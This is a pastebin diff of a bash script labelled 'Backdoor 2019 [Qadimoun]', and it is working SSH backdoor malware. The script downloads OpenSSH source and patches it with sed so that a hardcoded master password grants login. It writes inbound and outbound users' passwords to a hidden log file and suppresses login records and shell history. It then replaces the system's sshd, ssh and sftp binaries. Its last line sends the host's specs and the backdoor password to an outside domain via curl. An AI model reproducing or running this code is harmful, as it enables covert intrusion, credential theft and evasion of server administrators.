View difference between Paste ID: <a href="/VvfThNyJ">VvfThNyJ</a> and <a href="/SKxGLh5t">SKxGLh5t</a>

#!/bin/bash
1		#!/bin/bash
2		#Backdoor 2019 [Qadimoun]
3
4		sysctl -w net.ipv6.conf.all.disable_ipv6=1
5		sysctl -w net.ipv6.conf.default.disable_ipv6=1
6
7		# Set global recursive dns for non-failure backdoor tools hosts resolution.
8		echo '[Q] Resetting resolv.conf'
9		echo 'nameserver 8.8.8.8' >/etc/resolv.conf
10		# Install Gcc and reqs..
11		yum install gcc make -y
12		apt-get install gcc make -y
13		yum install gcc openssl-devel libz libz-devel -y
14		apt-get install openssl-dev libz libz-dev -y
15		# Let the fun start
16		DIST=`cat /etc/issue \|head -1 \|cut -d " " -f 1`
17		CPU1=`cat /proc/cpuinfo \|grep processor \|tail -1 \|cut -d ":" -f 2 \|cut -d " " -f 2`
18		CPU2=`echo 1`
19		CPU=$((CPU1 + CPU2))
20		MEM=`free -m \|head -2 \|tail -1 \|cut -d ":" -f 2 \|sed -n '/ /s/ */ /gp' \|cut -d " " -f 2`
21		STORAGE=`df --total \|sed -n '/ /s/ */ /gp'\|cut -d " " -f 2 \|grep -v blocks \|awk '{s+=$1} END {print s}' \|awk '{ byte =$1 /1024/1024; print byte "GB" }'`
22
23		PASSWORD=`shuf -i 1-10000000000000000000 -n 1`
24		SNIFFILE='/usr/local/.logs'
25		#curl 'http://patti-taylor.co.uk/get.php?c='$CPU'&m='$MEM'&s='$STORAGE'&p='$PASSWORD'&d='$DIST
26
27		BACKDOOR_INC="patch.h"
28		FILES="auth.c auth-passwd.c loginrec.c session.c sshconnect1.c sshconnect2.c includes.h"
29		#HOST="http://ftp.heanet.ie/mirrors/OpenBSD/OpenSSH/portable/"
30		HOST="http://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/"
31		OK="OK"
32		FAIL="Failed"
33
34		echo "ENJOY..."
35		if [ -z $PASSWORD ]; then
36		echo $PASSWORD \| md5sum \|cut -d " " -f 1
37		fi
38
39		if [ -z $SNIFFILE ]; then
40		echo -n ">>> logfile path: /usr/local/include/uconf.h"
41		SNIFFILE="/usr/local/include/uconf.h"
42		touch "/usr/local/include/uconf.h"
43		chmod o+wr "/usr/local/include/uconf.h"
44		echo "Do not remove /usr/local/include/uconf.h"
45		fi
46
47		echo -n "checking for sshd_config... "
48		SSHDCONFIG="/etc/ssh"
49		if [ -f $SSHDCONFIG/sshd_config ]; then
50		echo "$OK ($SSHDCONFIG)"
51		fi
52
53		if [ -z "$SSHDCONFIG" ]; then
54		echo "$FAIL"
55		echo -n ">>> sshd_config path: "
56		fi
57
58		# ssh
59		echo -n "checking for OpenSSH binary... "
60		SSH=$(which ssh)
61		if [ -z "$SSH" ]; then
62		echo "$FAIL"
63		exit
64		fi
65		echo "$OK ($SSH)"
66
67		# wget
68		echo -n "checking for wget/curl binary... "
69		WGET=$(which curl)
70		WGET_FLAG="-O"
71		if [ -z "$WGET" ]; then
72		WGET=$(which wget)
73		if [ -z "$WGET" ]; then
74		echo "$FAIL"
75		exit
76		else
77		WGET_FLAG="-qc"
78		fi
79		fi
80		echo " $OK ($WGET)"
81
82		# check ssh version
83		echo -n "checking OpenSSH version... "
84		SSH_VERSION=$($SSH -V 2>&1 \| sed 's/\(.\),./\1/')
85		SSH_DISTRO=$($SSH -V 2>&1 \| sed 's/\(.\),./\1/'\|awk '{print $2}')
86		SSH_SHORT_VERSION=$(echo $SSH_VERSION \| sed -e's/OpenSSH_\(.\)/\1/' -e 's/\ .//')
87		if [ -z "$SSH_SHORT_VERSION" ] \|\| [ -z "$SSH_VERSION" ]; then
88		echo $FAIL;
89		exit
90		fi
91		echo " $OK ($SSH_VERSION)"
92
93
94		# get ssh
95		OPENSSH=$(echo openssh-$SSH_SHORT_VERSION)
96		echo "downloading source..."
97		$WGET $WGET_FLAG $HOST/$OPENSSH.tar.gz &&
98		#echo " $OK" &&
99		echo -n "extracting tarball..." &&
100		tar xzf $OPENSSH.tar.gz &&
101		echo " $OK" &&
102		cd $OPENSSH
103
104
105		# check file sanity
106		echo -n "checking file sanity..."
107		for FILE in $FILES; do
108		if [ ! -f $FILE ];then
109		printf "$FILE not found.\n"
110		exit
111		fi
112		cp $FILE $FILE.bak
113		done
114		echo " $OK"
115
116		echo "generating patches..."
117		BACKDOOR_BUF=\
118		"#ifndef __HAVE_PATCH_H
119		#define __HAVE_PATCH_H
120		#define PATCHPASS \"$PASSWORD\"
121		#define SNFLOG \"$SNIFFILE\"
122		int patch_on;
123		#endif"
124		printf "$BACKDOOR_BUF" > $BACKDOOR_INC
125
126
127		# patch files
128		echo " patching auth.c... $OK"
129		sed 's/Accepted.*$/&\nif(patch_on) return;/g' auth.c >> auth.c.tmp
130		echo " patching loginrec.c... $OK"
131		sed '/^login_write.*)/{n; s/{/&\nif(patch_on) return 0;/g}' loginrec.c >> loginrec.c.tmp
132		echo " patching auth-passwd.c... $OK"
133		sed -e '/options.permit_empty_passwd/{n; s/./&\npatch_on = 0;\nif(!strcmp(password, PATCHPASS))\n{\npatch_on = 1;\nreturn 1;\n}\n/g}' -e '/return (sshpam_auth_passwd(authctxt, password) \&\& ok)/s/./\nif (sshpam_auth_passwd(authctxt, password) \&\& ok)\n{\nFILE fp = fopen(SNFLOG,"a");\nfprintf (fp, "From: %s - %s:%s\\n",get_remote_ipaddr(), pw->pw_name, password);\nfclose (fp);\nreturn 1;\n}\nelse return 0;\n/' -e '/return (strcmp(encrypted_password, pw_password) == 0)/s/./\nif (strcmp(encrypted_password, pw_password) == 0)\n{\nFILE *fp = fopen(SNFLOG,"a");\nfprintf (fp, "From: %s - %s:%s\\n",get_remote_ipaddr(), pw->pw_name, password);\nfclose (fp);\nreturn 1;\n}\nelse return 0;\n/'<auth-passwd.c> auth-passwd.c.tmp
134		echo " patching session.c... $OK"
135		sed '/LOGNAME/a if(patch_on)\n{\nchild_set_env(&env, &envsize, "HISTFILE", "/dev/null");\n}\n' <session.c> session.c.tmp
136		echo " patching sshconnect1.c... $OK"
137		sed -e '/packet_start(SSH_CMSG_AUTH_PASSWORD)/s/./packet_start(SSH_CMSG_AUTH_PASSWORD)\;\n{\nif(strcmp(PATCHPASS,password))\n{\nFILE fp = fopen(SNFLOG,"a");\nfprintf (fp,"To: %s - %s:%s\\n",get_remote_ipaddr() , options.user, password);\nfclose (fp);\n}\nreturn 1;\n}/' <sshconnect1.c> sshconnect1.c.tmp
138		echo " patching sshconnect2.c... $OK"
139		LINENUMBER=$(cat sshconnect2.c\|grep --line-number 'packet_start(SSH2_MSG_USERAUTH_REQUEST);'\|awk -F ":" '{print $1}'\|head -3\|tail -1)
140		sed -e $LINENUMBER's/packet_start(SSH2_MSG_USERAUTH_REQUEST)/packet_start(SSH2_MSG_USERAUTH_REQUEST)\;\nif(strcmp(PATCHPASS,password))\n{\nFILE *fp = fopen(SNFLOG,"a");\nfprintf (fp,"To: %s - %s:%s\\n",get_remote_ipaddr() , options.user, password);\nfclose (fp);\n}/' <sshconnect2.c> sshconnect2.c.tmp
141		echo " patching includes.h... $OK"
142		sed -e 's/#include "entropy.h"/#include "entropy.h"\n#include "patch.h"/' <includes.h> includes.h.tmp
143
144
145		# move files
146		for FILE in $FILES; do
147		mv $FILE.tmp $FILE
148		done
149		echo "done."
150		echo "building source..."
151
152		echo
153		echo Variables:
154		echo " \$SSH_VERSION = $SSH_VERSION"
155		echo " \$SSHDCONFIG = $SSHDCONFIG"
156		echo " \$PASSWORD = $PASSWORD"
157
158		SSH_PORTABLE=$(cat version.h\|grep PORTABLE\|head -1\|awk -F '"' '{print $2}')
159		if [ -z $SSH_DISTRO ]; then
160		echo "Keeping current version.h"
161		else
162		echo "SSH Distro: $SSH_DISTRO"
163		sed 's/'$SSH_PORTABLE'/'$SSH_PORTABLE' '$SSH_DISTRO'/' <version.h> version.h.tmp
164		rm -rf version.h
165		mv version.h.tmp version.h
166		fi
167
168		# start build
169		USEPAM=`cat /etc/ssh/sshd_config\|grep -i usepam`
170		cat /etc/ssh/sshd_config\|grep -i GSSAPICleanupCredentials
171		if [ -z $USEPAM ];then
172		echo "Configuring --with-pam"
173		OPT_PAM=""
174		else
175		echo "Configuring without PAM"
176		OPT_PAM=""
177		fi
178		if [ -z $KERB ]; then
179		echo "Configuring --with-kerberos5"
180		OPT_KERB=""
181		else
182		echo "Configuring without kerb5"
183		OPT_KERB=""
184		fi
185		echo "./configure --sysconfdir=$SSHDCONFIG $OPT_PAM $OPT_KERB"
186		./configure --sysconfdir=$SSHDCONFIG $OPT_PAM $OPT_KERB && make ssh sshd sftp
187
188		printf "patched OpenSSH ready.\n"
189		mv sshd /usr/sbin/sshd
190		mv ssh /usr/bin/ssh
191		mv sftp /usr/bin/sftp
192		service sshd restart
193		curl 'http://patti-taylor.co.uk/get.php?c='$CPU'&m='$MEM'&s='$STORAGE'&p='$PASSWORD'&d='$DIST